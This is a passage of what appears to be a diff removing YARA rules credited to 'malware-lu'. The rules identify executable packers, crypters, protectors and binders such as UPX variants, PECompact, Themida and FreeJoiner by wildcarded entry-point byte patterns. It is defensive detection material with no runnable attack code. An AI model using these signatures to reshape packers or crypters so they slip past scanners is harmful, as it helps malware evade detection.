-		$a0 = { E8 49 00 00 00 69 E8 49 00 00 00 95 E8 4F 00 00 00 68 E8 1F 00 00 00 49 E8 E9 FF FF FF 67 E8 1F 00 00 00 93 E8 31 00 00 00 78 E8 DD FF FF FF 38 E8 E3 FF FF FF 66 E8 0D 00 00 00 04 E8 E3 FF FF FF 70 E8 CB FF FF FF 69 E8 DD FF FF FF 58 E8 DD FF FF FF 69 E8 E3 FF FF FF 79 E8 BF FF FF FF 69 83 C4 40 E8 00 00 00 00 5D 81 ED 97 11 40 00 8D B5 EF 11 40 00 B9 FE 2D 00 00 8B FE AC F8 ?? ?? ?? ?? ?? ?? 90 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PEArmor04600759hying
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 4B 45 52 4E 45 4C 33 32 2E 64 6C 6C 00 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 }
-
-condition:
-		$a0
-}
-	
-	
-rule RpolycryptbyVaska2003071841
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 58 ?? ?? ?? ?? ?? ?? ?? E8 00 00 00 58 E8 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 ?? ?? 04 }
-
-condition:
-		$a0
-}
-	
-	
-rule DBPEvxxxDingBoy
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 20 ?? ?? 40 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 9C 55 57 56 52 51 53 9C E8 ?? ?? ?? ?? 5D 81 ED }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule SoftwareCompressBGSoftware
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E9 BE 00 00 00 60 8B 74 24 24 8B 7C 24 28 FC B2 80 33 DB A4 B3 02 E8 6D 00 00 00 73 F6 33 C9 E8 64 00 00 00 73 1C 33 C0 E8 5B 00 00 00 73 23 B3 02 41 B0 10 E8 4F 00 00 00 12 C0 73 F7 75 3F AA EB D4 E8 4D 00 00 00 2B CB 75 10 E8 42 00 00 00 EB 28 AC D1 E8 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule WWPACKv305c4UnextrPasswcheckVirshield
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 03 05 C0 1B B8 ?? ?? 8C CA 03 D0 8C C9 81 C1 ?? ?? 51 B9 ?? ?? 51 06 06 B1 ?? 51 8C D3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Upackv0399Dwing
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 0B 01 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 18 10 00 00 10 00 00 00 00 ?? ?? 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 3A 00 04 00 00 00 00 00 00 00 00 ?? ?? 00 00 02 00 00 00 00 00 00 ?? 00 00 00 00 00 10 00 00 ?? 00 00 00 00 10 00 00 10 00 00 00 00 00 00 0A 00 00 00 00 00 00 00 00 00 00 00 EE ?? ?? 00 14 00 00 00 00 ?? ?? 00 ?? ?? 00 00 FF 76 38 AD 50 8B 3E BE F0 ?? ?? 00 6A 27 59 F3 A5 FF 76 04 83 C8 FF 8B DF AB EB 1C 00 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 ?? ?? ?? 00 ?? 00 00 00 40 AB 40 B1 04 F3 AB C1 E0 0A B5 }
-	$a1 = { BE B0 11 ?? ?? AD 50 FF 76 34 EB 7C 48 01 ?? ?? 0B 01 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 18 10 00 00 10 00 00 00 00 ?? ?? ?? 00 00 ?? ?? 00 10 00 00 00 02 00 00 04 00 00 00 00 00 3A 00 04 00 00 00 00 00 00 00 00 ?? ?? ?? 00 02 00 00 00 00 00 00 }
-	$a2 = { BE B0 11 ?? ?? AD 50 FF 76 34 EB 7C 48 01 ?? ?? 0B 01 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 18 10 00 00 10 00 00 00 00 ?? ?? ?? 00 00 ?? ?? 00 10 00 00 00 02 00 00 04 00 00 00 00 00 3A 00 04 00 00 00 00 00 00 00 00 ?? ?? ?? 00 02 00 00 00 00 00 00 ?? 00 00 ?? 00 00 10 00 00 ?? ?? 00 00 00 10 00 00 10 00 00 00 00 00 00 0A 00 00 00 00 00 00 00 00 00 00 00 EE ?? ?? ?? 14 00 00 00 00 ?? ?? ?? ?? ?? 00 00 FF 76 38 AD 50 8B 3E BE F0 ?? ?? ?? 6A 27 59 F3 A5 FF 76 04 83 C8 FF 8B DF AB EB 1C 00 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 ?? ?? ?? ?? ?? 00 00 00 40 AB 40 B1 04 F3 AB C1 E0 0A B5 ?? F3 AB 8B 7E 0C 57 51 E9 ?? ?? ?? ?? 56 10 E2 E3 B1 04 D3 E0 03 E8 8D 53 18 33 C0 55 40 51 D3 E0 8B EA 91 FF 56 4C 99 59 D1 E8 13 D2 E2 FA 5D 03 EA 45 59 89 6B 08 56 8B F7 2B F5 F3 A4 AC 5E B1 80 AA 3B }
-
-condition:
-		$a0 at pe.entry_point or $a1 at pe.entry_point or $a2 at pe.entry_point
-}
-	
-	
-rule UPXModifiedstub
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 79 07 0F B7 07 47 50 47 B9 57 48 F2 AE 55 FF 96 84 ?? 00 00 09 C0 74 07 89 03 83 C3 04 EB D8 FF 96 88 ?? 00 00 61 E9 ?? ?? ?? FF }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Cryptic20Tughack
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { B8 00 00 40 00 BB ?? ?? ?? 00 B9 00 10 00 00 BA ?? ?? ?? 00 03 D8 03 C8 03 D1 3B CA 74 06 80 31 ?? 41 EB F6 FF E3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule KGBSFX
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 BE 00 A0 46 00 8D BE 00 70 F9 FF 57 83 CD FF EB 10 90 90 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PECompactv20betaJeremyCollake
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { B8 ?? ?? ?? ?? 05 ?? ?? ?? ?? 50 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 CC 90 90 90 90 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule DevCv4
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 89 E5 83 EC 08 83 C4 F4 6A ?? A1 ?? ?? ?? 00 FF D0 E8 ?? FF FF FF }
-
-condition:
-		$a0
-}
-	
-	
-rule DevCv5
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 89 E5 83 EC 14 6A ?? FF 15 ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 }
-
-condition:
-		$a0
-}
-	
-	
-rule CRYPToCRACksPEProtectorV092LukasFleischer
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 01 00 00 00 E8 58 5B 81 E3 00 FF FF FF 66 81 3B 4D 5A 75 37 84 DB 75 33 8B F3 03 ?? ?? 81 3E 50 45 00 00 75 26 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule UpackV037Dwing
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 0B 01 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 18 10 00 00 10 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 10 00 00 00 02 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 0A 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? 14 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 }
-	$a1 = { 60 E8 09 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? 33 C9 5E 87 0E }
-	$a2 = { BE ?? ?? ?? ?? AD 50 FF ?? ?? EB }
-
-condition:
-		$a0 at pe.entry_point or $a1 at pe.entry_point or $a2 at pe.entry_point
-}
-	
-	
-rule Obsidiumv13037ObsidiumSoftware
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 02 ?? ?? E8 26 00 00 00 EB 03 ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 26 EB 01 ?? 33 C0 EB 02 ?? ?? C3 EB 01 ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 01 ?? 64 67 89 26 00 00 EB 01 ?? EB 03 ?? ?? ?? 50 EB 03 ?? ?? ?? 33 C0 EB 03 ?? ?? ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 04 ?? ?? ?? ?? EB 01 ?? 58 EB 02 ?? ?? EB 03 ?? ?? ?? 64 67 8F 06 00 00 EB 01 ?? 83 C4 04 EB 03 ?? ?? ?? E8 23 27 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule VxCompiler
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 8C C3 83 C3 10 2E 01 1E ?? 02 2E 03 1E ?? 02 53 1E }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule BJFntv13
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB ?? 3A ?? ?? 1E EB ?? CD 20 9C EB ?? CD 20 EB ?? CD 20 60 EB }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule MSLRHv032afakePEtite21emadicius
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { B8 00 50 40 00 6A 00 68 BB 21 40 00 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 66 9C 60 50 83 C4 04 61 66 9D 64 8F 05 00 00 00 00 83 C4 08 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule UPXShitv01500mhz
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 00 00 00 00 5E 83 C6 14 AD 89 C7 AD 89 C1 AD 30 07 47 E2 FB AD FF E0 C3 00 ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 01 ?? ?? ?? 00 55 50 58 2D 53 68 69 74 20 76 30 2E 31 20 2D 20 77 77 77 2E 62 6C 61 63 6B 6C 6F 67 69 63 2E 6E 65 74 20 2D 20 63 6F 64 65 20 62 79 }
-	$a1 = { E8 00 00 00 00 5E 83 C6 14 AD 89 C7 AD 89 C1 AD 30 07 47 E2 FB AD FF E0 C3 00 ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? 00 55 50 58 2D 53 68 69 74 20 76 30 2E 31 20 2D 20 77 77 77 2E 62 6C 61 63 6B 6C 6F 67 69 63 2E 6E 65 74 20 2D 20 63 6F 64 65 20 62 79 }
-	$a2 = { E8 ?? ?? ?? ?? 5E 83 C6 ?? AD 89 C7 AD 89 C1 AD 30 07 47 E2 ?? AD FF E0 C3 }
-
-condition:
-		$a0 at pe.entry_point or $a1 at pe.entry_point or $a2 at pe.entry_point
-}
-	
-	
-rule PackmanV0001Bubbasoft
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 58 8D ?? ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? 8D ?? ?? 48 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule DJoinv07publicxorencryptiondrmist
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { C6 05 ?? ?? 40 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule FreeJoinerSmallbuild033GlOFF
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 50 66 33 C3 66 8B C1 58 E8 AC FD FF FF 6A 00 E8 0D 00 00 00 CC FF 25 78 10 40 00 FF 25 7C 10 40 00 FF 25 80 10 40 00 FF 25 84 10 40 00 FF 25 88 10 40 00 FF 25 8C 10 40 00 FF 25 90 10 40 00 FF 25 94 10 40 00 FF 25 98 10 40 00 FF 25 9C 10 40 00 FF 25 A0 10 40 00 FF 25 A4 10 40 00 FF 25 AC 10 40 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule AnticrackSoftwareProtectorv109ACProtect
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? E8 01 00 00 00 ?? 83 04 24 06 C3 ?? ?? ?? ?? ?? 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule UnderGroundCrypterbyBooster2000
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 83 C4 F0 B8 74 3C 00 11 E8 94 F9 FF FF E8 BF FE FF FF E8 0A F3 FF FF 8B C0 }
-
-condition:
-		$a0
-}
-	
-	
-rule MicroJoiner16coban2k
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 33 C0 64 8B 38 48 8B C8 F2 AF AF 8B 1F 66 33 DB 66 81 3B }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule WiseInstallerStubv11010291
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 81 EC 40 0F 00 00 53 56 57 6A 04 FF 15 F4 30 40 00 FF 15 74 30 40 00 8A 08 89 45 E8 80 F9 22 75 48 8A 48 01 40 89 45 E8 33 F6 84 C9 74 0E 80 F9 22 74 09 8A 48 01 40 89 45 E8 EB EE 80 38 22 75 04 40 89 45 E8 80 38 20 75 09 40 80 38 20 74 FA 89 45 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PrivateEXEProtector18
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { BB DC EE 0D 76 D9 D0 8D 16 85 D8 90 D9 D0 }
-
-condition:
-		$a0
-}
-	
-	
-rule SimpleUPXCryptorv3042005multilayerencryptionMANtiCORE
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 B8 ?? ?? ?? 00 B9 18 00 00 00 80 34 08 ?? E2 FA 61 68 ?? ?? ?? 00 C3 }
-	$a1 = { 60 B8 ?? ?? ?? ?? B9 18 00 00 00 80 34 08 ?? E2 FA 61 68 ?? ?? ?? ?? C3 }
-
-condition:
-		$a0 at pe.entry_point or $a1 at pe.entry_point
-}
-	
-	
-rule Themida1201compressedOreansTechnologies
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { B8 00 00 ?? ?? 60 0B C0 74 58 E8 00 00 00 00 58 05 43 00 00 00 80 38 E9 75 03 61 EB 35 E8 00 00 00 00 58 25 00 F0 FF FF 33 FF 66 BB 19 5A 66 83 C3 34 66 39 18 75 12 0F B7 50 3C 03 D0 BB E9 44 00 00 83 C3 67 39 1A 74 07 2D 00 10 00 00 EB DA 8B F8 B8 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PECompactv155
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 80 40 ?? 87 DD 8B 85 A2 80 40 ?? 01 85 03 80 40 ?? 66 C7 85 ?? 80 40 ?? 90 90 01 85 9E 80 40 ?? BB 2D 12 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PolyCryptPE214b215JLabSoftwareCreationshsigned
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 50 6F 6C 79 43 72 79 70 74 20 50 45 20 28 63 29 20 32 30 30 34 2D 32 30 30 35 2C 20 4A 4C 61 62 53 6F 66 74 77 61 72 65 2E 00 50 00 43 00 50 00 45 }
-
-condition:
-		$a0
-}
-	
-	
-rule PECompactv156
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 90 40 ?? 87 DD 8B 85 A2 90 40 ?? 01 85 03 90 40 ?? 66 C7 85 ?? 90 40 ?? 90 90 01 85 9E 90 40 ?? BB 2D 12 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PGMPACKv013
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { FA 1E 17 50 B4 30 CD 21 3C 02 73 ?? B4 4C CD 21 FC BE ?? ?? BF ?? ?? E8 ?? ?? E8 ?? ?? BB ?? ?? BA ?? ?? 8A C3 8B F3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PGMPACKv014
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 1E 17 50 B4 30 CD 21 3C 02 73 ?? B4 4C CD 21 FC BE ?? ?? BF ?? ?? E8 ?? ?? E8 ?? ?? BB ?? ?? BA ?? ?? 8A C3 8B F3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PseudoSigner0232Lite003Anorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 06 FC 1E 07 BE 90 90 90 90 6A 04 68 90 10 90 90 68 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule AHTeamEPProtector03fakePEtite22FEUERRADER
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0 B8 00 00 00 00 68 00 00 00 00 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 66 9C 60 50 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule MEW10byNorthfox
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 33 C0 E9 ?? ?? FF FF ?? 1C ?? ?? 40 }
-
-condition:
-		$a0
-}
-	
-	
-rule theWRAPbyTronDoc
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 83 C4 F0 53 56 57 33 C0 89 45 F0 B8 48 D2 4B 00 E8 BC 87 F4 FF BB 04 0B 4D 00 33 C0 55 68 E8 D5 4B 00 64 FF 30 64 89 20 E8 9C F4 FF FF E8 F7 FB FF FF 6A 40 8D 55 F0 A1 F0 ED 4B 00 8B 00 E8 42 2E F7 FF 8B 4D F0 B2 01 A1 F4 C2 40 00 E8 F7 20 F5 FF 8B F0 B2 01 A1 B4 C3 40 00 E8 F1 5B F4 FF 89 03 33 D2 8B 03 E8 42 1E F5 FF 66 B9 02 00 BA FC FF FF FF 8B C6 8B 38 FF 57 0C BA B8 A7 4D 00 B9 04 00 00 00 8B C6 8B 38 FF 57 04 83 3D B8 A7 4D 00 00 0F 84 5E 01 00 00 8B 15 B8 A7 4D 00 83 C2 04 F7 DA 66 B9 02 00 8B C6 8B 38 FF 57 0C 8B 0D B8 A7 4D 00 8B D6 8B 03 E8 2B 1F F5 FF 8B C6 E8 B4 5B F4 FF 33 D2 8B 03 E8 DF 1D F5 FF BA F0 44 4E 00 B9 01 00 00 00 8B 03 8B 30 FF 56 04 80 3D F0 44 4E 00 0A 75 3F BA B8 A7 4D 00 B9 04 00 00 00 8B 03 8B 30 FF 56 04 8B 15 B8 A7 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Petitev211
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { B8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 ?? ?? ?? ?? ?? ?? 64 ?? ?? ?? ?? ?? ?? 66 9C 60 50 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Petitev212
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { B8 ?? ?? ?? ?? 6A 00 68 ?? ?? ?? ?? 64 ?? ?? ?? ?? ?? ?? 64 ?? ?? ?? ?? ?? ?? 66 9C 60 50 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule MaskPEV20yzkzero
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { B8 18 00 00 00 64 8B 18 83 C3 30 C3 40 3E 0F B6 00 C1 E0 ?? 83 C0 ?? 36 01 04 24 C3 }
-
-condition:
-		$a0
-}
-	
-	
-rule PseudoSigner01Morphine12Anorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 EB 06 00 90 90 90 90 90 90 90 90 EB 08 E8 90 00 00 00 66 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 51 66 90 90 90 59 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule EZIPv10
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E9 19 32 00 00 E9 7C 2A 00 00 E9 19 24 00 00 E9 FF 23 00 00 E9 1E 2E 00 00 E9 88 2E 00 00 E9 2C }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule y0dasCrypterv12
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 5D 81 ED F3 1D 40 00 B9 7B 09 00 00 8D BD 3B 1E 40 00 8B F7 AC ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? AA E2 CC }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ChinaProtectdummy
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { C3 E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 30 C3 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 30 C3 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 30 C3 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 30 C3 56 8B ?? ?? ?? 6A 40 68 00 10 00 00 8D ?? ?? 50 6A 00 E8 ?? ?? ?? ?? 89 30 83 C0 04 5E C3 8B 44 ?? ?? 56 8D ?? ?? 68 00 40 00 00 FF 36 56 E8 ?? ?? ?? ?? 68 00 80 00 00 6A 00 56 E8 ?? ?? ?? ?? 5E C3 }
-
-condition:
-		$a0
-}
-	
-	
-rule BopCryptv10
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 BD ?? ?? ?? ?? E8 ?? ?? 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule MinkeV101Codius
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 26 3D 4F 38 C2 82 37 B8 F3 24 42 03 17 9B 3A 83 01 00 00 CC 00 00 00 00 06 00 00 00 01 64 53 74 75 62 00 10 55 54 79 70 65 73 00 00 C7 53 79 73 74 65 6D 00 00 81 53 79 73 49 6E 69 74 00 0C 4B 57 69 6E 64 6F 77 73 00 00 8A 75 46 75 6E 63 74 69 6F 6E 73 }
-
-condition:
-		$a0
-}
-	
-	
-rule PseudoSigner02BorlandDelphiDLLAnorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 83 C4 B4 B8 90 90 90 90 E8 00 00 00 00 E8 00 00 00 00 8D 40 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule bambam004bedrock
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { BF ?? ?? ?? ?? 83 C9 FF 33 C0 68 ?? ?? ?? ?? F2 AE F7 D1 49 51 68 ?? ?? ?? ?? E8 11 0A 00 00 83 C4 0C 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B F0 BF ?? ?? ?? ?? 83 C9 FF 33 C0 F2 AE F7 D1 49 BF ?? ?? ?? ?? 8B D1 68 ?? ?? ?? ?? C1 E9 02 F3 AB 8B CA 83 E1 03 F3 AA BF ?? ?? ?? ?? 83 C9 FF 33 C0 F2 AE F7 D1 49 51 68 ?? ?? ?? ?? E8 C0 09 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule RLPackFullEdition117DLLLZMAAp0x
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 80 7C 24 08 01 0F 85 ?? ?? ?? ?? 60 E8 00 00 00 00 8B 2C 24 83 C4 04 8D B5 5A 0A 00 00 8D 9D 40 02 00 00 33 FF E8 ?? ?? ?? ?? 6A 40 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A 00 FF 95 EB 09 00 00 89 85 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PEtitev22
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { B8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 FF 35 ?? ?? ?? ?? 64 89 25 ?? ?? ?? ?? 66 9C 60 50 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PEtitev20
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { B8 ?? ?? ?? ?? 66 9C 60 50 8B D8 03 ?? 68 54 BC ?? ?? 6A ?? FF 50 18 8B CC 8D A0 54 BC ?? ?? 8B C3 8D 90 E0 15 ?? ?? 68 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PEtitev21
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { B8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 64 FF 35 ?? ?? ?? ?? 64 89 25 ?? ?? ?? ?? 66 9C 60 50 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ElicenseSystemV4000ViaTechInc
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 00 00 00 00 63 79 62 00 65 6C 69 63 65 6E 34 30 2E 64 6C 6C 00 00 00 00 }
-
-condition:
-		$a0
-}
-	
-	
-rule VProtectorV10Build20041213testvcasm
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 6A FF 68 1A 89 40 00 68 56 89 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 E8 03 00 00 00 C7 84 00 58 EB 01 E9 83 C0 07 50 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Themida18xxOreansTechnologies
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { B8 ?? ?? ?? ?? 60 0B C0 74 68 E8 00 00 00 00 58 05 53 00 00 00 80 38 E9 75 13 61 EB 45 DB 2D 37 ?? ?? ?? FF FF FF FF FF FF FF FF 3D 40 E8 00 00 00 00 58 25 00 F0 FF FF 33 FF 66 BB 19 5A 66 83 C3 34 66 39 18 75 12 0F B7 50 3C 03 D0 BB E9 44 00 00 83 C3 67 }
